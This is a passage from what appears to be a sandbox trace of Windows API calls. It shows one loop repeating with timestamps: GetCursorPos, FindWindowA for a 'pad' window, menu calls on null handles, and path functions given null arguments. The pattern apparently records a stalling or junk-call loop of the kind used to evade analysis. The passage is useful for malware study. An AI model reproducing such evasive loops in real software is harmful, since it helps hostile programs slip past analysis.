lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.669] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.669] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.669] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.669] GetMenu (hWnd=0x0) returned 0x0 [0100.669] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.669] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.669] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.669] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.669] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.669] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.669] GetStockObject (i=6) returned 0x1b00018 [0100.669] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.669] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.669] PathFileExistsW (pszPath=0x0) returned 0 [0100.669] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.669] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.669] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.669] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.669] GetMenu (hWnd=0x0) returned 0x0 [0100.670] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.670] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.670] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.670] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.670] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.670] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.670] GetStockObject (i=6) returned 0x1b00018 [0100.670] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.670] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.670] PathFileExistsW (pszPath=0x0) returned 0 [0100.670] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.670] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.670] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.670] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.670] GetMenu (hWnd=0x0) returned 0x0 [0100.670] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x411) returned -1 [0100.670] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.670] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.670] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.670] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.670] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.670] GetStockObject (i=6) returned 0x1b00018 [0100.670] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.670] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.670] PathFileExistsW (pszPath=0x0) returned 0 [0100.670] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.670] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.670] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.670] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.670] GetMenu (hWnd=0x0) returned 0x0 [0100.670] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.670] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.670] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.670] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.670] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.671] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.671] GetStockObject (i=6) returned 0x1b00018 [0100.671] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.671] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.671] PathFileExistsW (pszPath=0x0) returned 0 [0100.671] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.671] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.671] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.671] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.671] GetMenu (hWnd=0x0) returned 0x0 [0100.671] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.671] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.671] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.671] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.671] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.671] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.671] GetStockObject (i=6) returned 0x1b00018 [0100.671] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.671] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.671] PathFileExistsW (pszPath=0x0) returned 0 [0100.671] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.671] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.671] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.671] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.671] GetMenu (hWnd=0x0) returned 0x0 [0100.671] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.671] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.671] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.671] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.671] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.671] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.671] GetStockObject (i=6) returned 0x1b00018 [0100.671] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.671] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.671] PathFileExistsW (pszPath=0x0) returned 0 [0100.671] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.671] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.672] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.672] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.672] GetMenu (hWnd=0x0) returned 0x0 [0100.672] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.672] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.672] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.672] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.672] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.672] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.672] GetStockObject (i=6) returned 0x1b00018 [0100.672] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.672] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.672] PathFileExistsW (pszPath=0x0) returned 0 [0100.672] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.672] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.672] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.672] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.672] GetMenu (hWnd=0x0) returned 0x0 [0100.672] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x45d) returned -1 [0100.672] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.672] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.672] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.672] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.672] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.672] GetStockObject (i=6) returned 0x1b00018 [0100.672] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.672] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.672] PathFileExistsW (pszPath=0x0) returned 0 [0100.672] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.672] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.672] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.672] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.672] GetMenu (hWnd=0x0) returned 0x0 [0100.672] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.672] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.672] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.673] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.673] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.673] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.673] GetStockObject (i=6) returned 0x1b00018 [0100.673] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.673] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.673] PathFileExistsW (pszPath=0x0) returned 0 [0100.673] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.673] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.673] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.673] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.673] GetMenu (hWnd=0x0) returned 0x0 [0100.673] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.673] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.673] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.673] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.673] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.673] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.673] GetStockObject (i=6) returned 0x1b00018 [0100.673] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.673] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.673] PathFileExistsW (pszPath=0x0) returned 0 [0100.673] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.673] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.673] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.673] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.673] GetMenu (hWnd=0x0) returned 0x0 [0100.673] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.673] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.673] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.673] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.673] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.673] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.673] GetStockObject (i=6) returned 0x1b00018 [0100.673] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.673] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.674] PathFileExistsW (pszPath=0x0) returned 0 [0100.674] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.674] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.674] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.674] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.674] GetMenu (hWnd=0x0) returned 0x0 [0100.674] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.674] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.674] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.674] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.674] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.674] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.674] GetStockObject (i=6) returned 0x1b00018 [0100.674] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.674] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.674] PathFileExistsW (pszPath=0x0) returned 0 [0100.674] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.674] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.674] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.674] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.674] GetMenu (hWnd=0x0) returned 0x0 [0100.674] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x30e) returned -1 [0100.674] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.674] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.674] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.674] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.674] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.674] GetStockObject (i=6) returned 0x1b00018 [0100.674] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.674] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.674] PathFileExistsW (pszPath=0x0) returned 0 [0100.674] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.674] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.674] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.674] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.674] GetMenu (hWnd=0x0) returned 0x0 [0100.674] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.675] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.675] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.675] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.675] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.675] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.675] GetStockObject (i=6) returned 0x1b00018 [0100.675] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.675] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.675] PathFileExistsW (pszPath=0x0) returned 0 [0100.675] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.675] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.675] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.675] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.675] GetMenu (hWnd=0x0) returned 0x0 [0100.675] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.675] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.675] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.675] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.675] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.675] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.675] GetStockObject (i=6) returned 0x1b00018 [0100.676] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.676] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.676] PathFileExistsW (pszPath=0x0) returned 0 [0100.676] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.676] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.676] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.676] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.676] GetMenu (hWnd=0x0) returned 0x0 [0100.676] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.676] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.676] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.676] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.676] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.676] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.676] GetStockObject (i=6) returned 0x1b00018 [0100.676] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.676] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.676] PathFileExistsW (pszPath=0x0) returned 0 [0100.676] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.676] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.676] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.676] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.676] GetMenu (hWnd=0x0) returned 0x0 [0100.676] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.676] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.676] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.676] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.676] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.676] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.676] GetStockObject (i=6) returned 0x1b00018 [0100.676] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.676] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.676] PathFileExistsW (pszPath=0x0) returned 0 [0100.677] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.677] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.677] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.677] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.677] GetMenu (hWnd=0x0) returned 0x0 [0100.677] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x172) returned -1 [0100.677] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.677] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.677] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.677] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.677] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.677] GetStockObject (i=6) returned 0x1b00018 [0100.677] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.677] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.677] PathFileExistsW (pszPath=0x0) returned 0 [0100.677] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.677] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.677] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.677] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.677] GetMenu (hWnd=0x0) returned 0x0 [0100.677] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.677] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.677] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.677] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.677] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.677] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.677] GetStockObject (i=6) returned 0x1b00018 [0100.677] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.677] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.677] PathFileExistsW (pszPath=0x0) returned 0 [0100.677] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.677] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.677] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.677] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.677] GetMenu (hWnd=0x0) returned 0x0 [0100.678] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.678] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.678] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.678] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.678] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.678] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.678] GetStockObject (i=6) returned 0x1b00018 [0100.678] PathCombineW (in: 